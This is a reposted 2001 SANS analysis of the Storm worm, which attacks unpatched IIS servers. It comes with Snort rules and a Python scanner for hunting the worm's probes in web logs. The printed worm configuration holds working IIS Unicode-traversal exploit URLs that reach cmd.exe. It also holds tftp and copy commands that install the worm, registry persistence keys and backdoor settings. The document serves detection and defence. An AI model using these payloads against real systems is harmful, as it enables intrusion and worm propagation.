
DOS.STORM.WORM Technical Analysis by SANS

posted on June 13, 2001
by hitbsecnews

DESCRIPTION
DoS.Storm.Worm is a worm that seeks out Microsoft Internet Information Services (IIS) systems that have not applied the proper security patches. Any such systems that it finds are then infected with the worm. The payload of this worm performs a denial of service attack on http://www.microsoft.com [1] (http://www.symantec.com/avcenter/venc/data/dos.storm.worm.html)

It is packed with the UPX packer and is written in Java.

The main 'wrapper' class is 'runner.class'. It starts
the various pieces.

1. read 'datastore'
'datastore' is a class that is handed along and carries
a number of configuration parameters. When 'datastore'
is first instantiated, it looks for 'storm.cfg' and
overwrites any default parameters with the values it
finds in storm.cfg. A new storm.cfg is written if it
doesn't exist.

I appended the block with default parameters at the end.

If the value 'debug' is set to 'true', extra logging
is enabled.

2. send e-mail to 'emailreceive' (@gmx.net)
The body of the e-mail is one line listing the
host name and IP address of the infected machine followed
by the word 'startup.'

(see #A below for discussion of 'mailer')

3. set up tftpd.
This sets up a TFTP daemon on port 69.

4. start 'scanner'.
This part sends a variety of probe strings to a web server.
First, the server version is queried to check whether the server runs
IIS (see the 's' strings in datastore, which hold the IIS 'Server:' banners).
The probe strings are listed in 'datastore' and start with 'v'
(e.g. v1, v2 ...); the return value is compared to the 'r' strings
(r1, r2 ...) in datastore.

For vulnerable hosts, the 'installer' will then try and install
(and start) storm on the new machine. See the 'copy' and 'start'
variables in datastore. The installer verifies that the new copy is
running.

5. start 'telnetd'
Start a telnet server on the port given by 'telnetport' in
datastore (default 23001). The username and password are given in
'user' and 'pwd'.

6. start 'dosd'
dosd accesses each URL listed in the datastore variables starting
with 'dos'. By default, this is 'http://www.microsoft.com'.

7. start 'bombd'
Send an e-mail to each address listed in datastore under a
variable name starting with 'bomb' (e.g. bomb1); by default
gates@microsoft.com. The text of the message is in 'bombtext'.

8. start consoled
Console on port 23000 (or 'consoleport'). Same username and password
as telnetd.
It looks like this can be used to remotely configure storm and
overwrite various parameters in datastore (e.g. SMTP settings...).

9. modify registry.
All 'datastore' variables that start with 'register' are additions
to the system registry. By default, only two are used,
'register1' and 'register2', to start storm on reboot.

A. 'mailer'

mailer sends an e-mail to the SMTP server specified in datastore
(by default: mail.gmx.net). It uses a username/password to
authenticate itself.

--- default parameters from 'datastore.class' ---
banner=*********************** Storm (c) Agberd Celine 2000 ***********************
version=Storm v1.0
installed=?/c+tftp.exe+
extract=?/c+storm.exe+
run=?/c+c:\winnt\system32\storm\start.bat
extractresult=CGI
runresult=started.
smtp=mail.gmx.net
host=replacer
ttl=10000000
tftpdir=c:\winnt\system32\storm
telnetport=23001
consoleport=23000
dos1=http://www.microsoft.com
copy=?/c+copy+storm.exe+c:\winnt\system32\storm
copyresult=CGI
bomb1=gates@microsoft.com
bombtext=Fuck you!
check=?/c+dir
v1=/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe
v2=/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe
v3=/scripts/..%c1%1c../..%c1%1c../mssql7/install/pubtext.bat+&+cmd.exe/msadc
/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe=installedresult
r1=c:
r2=d:
r3=e:
r4=C:
r5=D:
r6=E:
s1=Server:Microsoft-IIS/4.0
s2=Server:Microsoft-IIS/5.0
register1=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunService\666=c:\winnt\system32\storm\start.bat
register2=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\666=c:\winnt\system32\storm\start.bat
shell=cmd.exe
systemlog1=Systemlog

DETECTION
Snort will pick up the probes to IIS with the following rules, which are available from
whitehats.com and snort.org:

http://www.whitehats.com/cgi/arachNIDS/Show?_id=ids452&view=signatures

alert TCP $EXTERNAL any -> $INTERNAL 80 (msg: "IDS452/web-iis_http-iis-unicode-binary"; flags: A+; content: "..|c0af|"; nocase;)

http://www.whitehats.com/cgi/arachNIDS/Show?_id=ids432&view=signatures

alert TCP $EXTERNAL any -> $INTERNAL 80 (msg: "IDS432/web-iis_http-iis-unicode-traversal"; flags: A+; content: "..|25|c1|25|1c"; nocase;)

http://www.snort.org

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-MISC Attempt to execute cmd"; flags: A+; content:"cmd.exe"; nocase;)
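As an added example (not part of the SANS advisory), the following Python script applies the same indicators the Snort rules above look for to IIS access-log lines, so the probes can also be hunted in web logs after the fact. It normalises both the percent-encoded form and the raw-byte form of the %c0%af / %c1%1c sequences before checking for a directory escape; the log lines are constructed for the example.

```python
import re
from urllib.parse import unquote_to_bytes

# Byte sequences the worm's probe URLs (the 'v' strings above) rely on: IIS's
# lenient UTF-8 decoder turned these overlong/invalid sequences into path
# separators, which is what lets "..%c0%af.." escape the web root.
OVERLONG = {b"\xc0\xaf": b"/", b"\xc1\x1c": b"\\"}

# Request-line extractor for Common Log Format entries.
REQUEST_RE = re.compile(rb'"(?:GET|HEAD|POST) (\S+) HTTP/')


def normalise_path(raw):
    """Percent-decode, then map the overlong sequences to the separators IIS
    produced, so the %-encoded and raw-byte forms of a probe look alike."""
    decoded = unquote_to_bytes(raw)
    for seq, sep in OVERLONG.items():
        decoded = decoded.replace(seq, sep)
    return decoded.decode("latin-1")


def classify(path):
    """Return the list of indicators found in one request path (bytes)."""
    findings = []
    if any(seq in unquote_to_bytes(path) for seq in OVERLONG):
        findings.append("unicode-traversal")   # what IDS452 / IDS432 match
    norm = normalise_path(path)
    if "../" in norm or "..\\" in norm:
        findings.append("dot-dot-escape")      # escape visible after normalising
    if "cmd.exe" in norm.lower():
        findings.append("cmd.exe")             # the snort.org WEB-MISC match
    return findings


def scan_log(log_bytes):
    """Return (client_ip, path, findings) for every suspicious request line."""
    hits = []
    for line in log_bytes.splitlines():
        m = REQUEST_RE.search(line)
        if m and classify(m.group(1)):
            ip = line.split(b" ", 1)[0].decode()
            hits.append((ip, m.group(1).decode("latin-1"), classify(m.group(1))))
    return hits


# Constructed sample access-log lines (not taken from the advisory).
SAMPLE_LOG = (
    b'10.0.0.5 - - [13/Jun/2001:10:02:11 +0000] "GET /iisadmpwd/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 512\n'
    b'10.0.0.5 - - [13/Jun/2001:10:02:12 +0000] "GET /scripts/..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp.exe HTTP/1.0" 200 212\n'
    b'10.0.0.9 - - [13/Jun/2001:10:03:40 +0000] "GET /index.html HTTP/1.0" 200 1043\n'
    b'10.0.0.7 - - [13/Jun/2001:10:04:02 +0000] "GET /msadc/..\xc0\xaf../..\xc0\xaf../winnt/system32/cmd.exe HTTP/1.0" 200 99\n'
)

if __name__ == "__main__":
    for ip, path, findings in scan_log(SAMPLE_LOG):
        print(ip, path, findings)
```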

REMOVAL
Symantec AntiVirus detects the worm, and Symantec provides instructions for cleaning an infected system:
http://www.symantec.com/avcenter/venc/data/dos.storm.worm.html

REFERENCES
http://www.incidents.org/
http://www.symantec.com/avcenter/venc/data/dos.storm.worm.html
http://www.incidents.org/react/unicode.php

CREDITS
This security advisory was prepared by Matt Fearnow of the SANS Institute and Johannes
Ullrich of the SANS Institute.
Also contributing efforts go to Lenny Zeltser and NIPC Labs.

MIRROR
This write up can be found at:
http://www.incidents.org/react/dosstormworm.php.
